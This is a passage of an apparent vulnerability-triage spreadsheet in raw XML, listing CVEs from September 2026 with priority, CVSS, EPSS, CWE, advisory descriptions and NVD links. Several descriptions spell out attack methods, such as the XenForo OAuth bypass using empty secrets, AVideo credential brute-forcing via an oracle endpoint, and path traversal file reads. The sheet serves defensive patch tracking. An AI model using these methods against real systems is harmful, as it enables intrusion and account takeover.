Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t></is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-67367</t></is></c><c r="D81" s="5" t="n"><v>9.199999999999999</v></c><c r="E81" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.008</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr" /><c r="M81" s="5" t="inlineStr" /><c r="N81" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S81" s="5" t="inlineStr"><is><t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t></is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-82067</t></is></c><c r="D82" s="5" t="n"><v>9.199999999999999</v></c><c r="E82" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.003</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K82" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L82" s="5" t="inlineStr" /><c r="M82" s="5" t="inlineStr" /><c r="N82" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="S82" s="5" t="inlineStr"><is><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is></c><c r="T82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-84197</t></is></c><c r="D83" s="5" t="n"><v>9.199999999999999</v></c><c r="E83" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.002</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr" /><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr"><is><t>CWE-295, CWE-297, CWE-300</t></is></c><c r="S83" s="5" t="inlineStr"><is><t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t></is></c><c r="T83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-62646</t></is></c><c r="D84" s="5" t="n"><v>9.1</v></c><c r="E84" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.003</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr" /><c r="L84" s="5" t="inlineStr" /><c r="M84" s="5" t="inlineStr" /><c r="N84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr"><is><t>CWE-331</t></is></c><c r="S84" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A session identifier is generated using an algorithm with insufficient randomness, resulting in a token with low entropy that can be predicted or brute-forced within a feasible number of attempts. This could allow an unauthenticated remote attacker to derive valid session identifiers and bypass authentication.</t></is></c><c r="T84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-69641</t></is></c><c r="D85" s="5" t="n"><v>9.1</v></c><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.008</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr" /><c r="L85" s="5" t="inlineStr" /><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S85" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-73309</t></is></c><c r="D86" s="5" t="n"><v>9.1</v></c><c r="E86" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.005</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L86" s="5" t="inlineStr" /><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S86" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t></is></c><c r="T86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-73311</t></is></c><c r="D87" s="5" t="n"><v>9.1</v></c><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.004</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L87" s="5" t="inlineStr" /><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S87" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t></is></c><c r="T87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-73312</t></is></c><c r="D88" s="5" t="n"><v>9.1</v></c><c r="E88" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.004</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L88" s="5" t="inlineStr" /><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S88" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t></is></c><c r="T88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-75156</t></is></c><c r="D89" s="5" t="n"><v>9.1</v></c><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.002</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr" /><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr" /><c r="M89" s="5" t="inlineStr" /><c r="N89" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S89" s="5" t="inlineStr"><is><t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.

The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t></is></c><c r="T89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-75746</t></is></c><c r="D90" s="5" t="n"><v>9.1</v></c><c r="E90" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.011</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr" /><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S90" s="5" t="inlineStr"><is><t>ColdFusion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code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-79571</t></is></c><c r="D91" s="5" t="n"><v>9.1</v></c><c r="E91" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.003</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr" /><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S91" s="5" t="inlineStr"><is><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is></c><c r="T91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-86729</t></is></c><c r="D92" s="5" t="n"><v>9.1</v></c><c r="E92" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.002</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr" /><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="S92" s="5" t="inlineStr"><is><t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t></is></c><c r="T92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-86840</t></is></c><c r="D93" s="5" t="n"><v>9.1</v></c><c r="E93" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.002</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr" /><c r="M93" s="5" t="inlineStr" /><c r="N93" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr"><is><t>CWE-639, CWE-862</t></is></c><c r="S93" s="5" t="inlineStr"><is><t>The `vtoken-minting` and `slpx` pallets in Bifrost contain an improper authorization vulnerability in channel commission attribution. A signed account can supply an arbitrary registered `channel_id` when minting tokens without verifying that the caller is authorized to mint on behalf of that channel. This allows an attacker to inflate a channel's recorded mint volume and cause protocol commission payments to be disproportionately distributed to that channel during commission settlement.</t></is></c><c r="T93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-53581</t></is></c><c r="D94" s="5" t="n"><v>9</v></c><c r="E94" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.003</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr" /><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S94" s="5" t="inlineStr"><is><t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t></is></c><c r="T94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-66768</t></is></c><c r="D95" s="5" t="n"><v>9</v></c><c r="E95" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.003</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr" /><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S95" s="5" t="inlineStr"><is><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is></c><c r="T95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-67378</t></is></c><c r="D96" s="5" t="n"><v>9</v></c><c r="E96" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.005</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K96" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L96" s="5" t="inlineStr" /><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S96" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-67636</t></is></c><c r="D97" s="5" t="n"><v>9</v></c><c r="E97" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.005</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K97" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L97" s="5" t="inlineStr" /><c r="M97" s="5" t="inlineStr" /><c r="N97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S97" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-69854</t></is></c><c r="D98" s="5" t="n"><v>9</v></c><c r="E98" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.006</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr" /><c r="M98" s="5" t="inlineStr" /><c r="N98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S98" s="5" t="inlineStr"><is><t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-85982</t></is></c><c r="D99" s="5" t="n"><v>9</v></c><c r="E99" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.002</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr" /><c r="M99" s="5" t="inlineStr" /><c r="N99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S99" s="5" t="inlineStr"><is><t>The Auth0 AD/LDAP Connector is vulnerable to stored Cross-Site Scripting (XSS) issues due to improper HTML encoding of data in search results and updater log content displayed in the admin panel. An authenticated user with privileges to modify directory attributes, or a low-privileged local user on the host where the connector is installed, could insert script content. This script content could then execute in an administrator's browser when they view the affected search results or update logs.</t></is></c><c r="T99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-50093</t></is></c><c r="D100" s="5" t="n"><v>8.9</v></c><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.002</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr" /><c r="L100" s="5" t="inlineStr" /><c 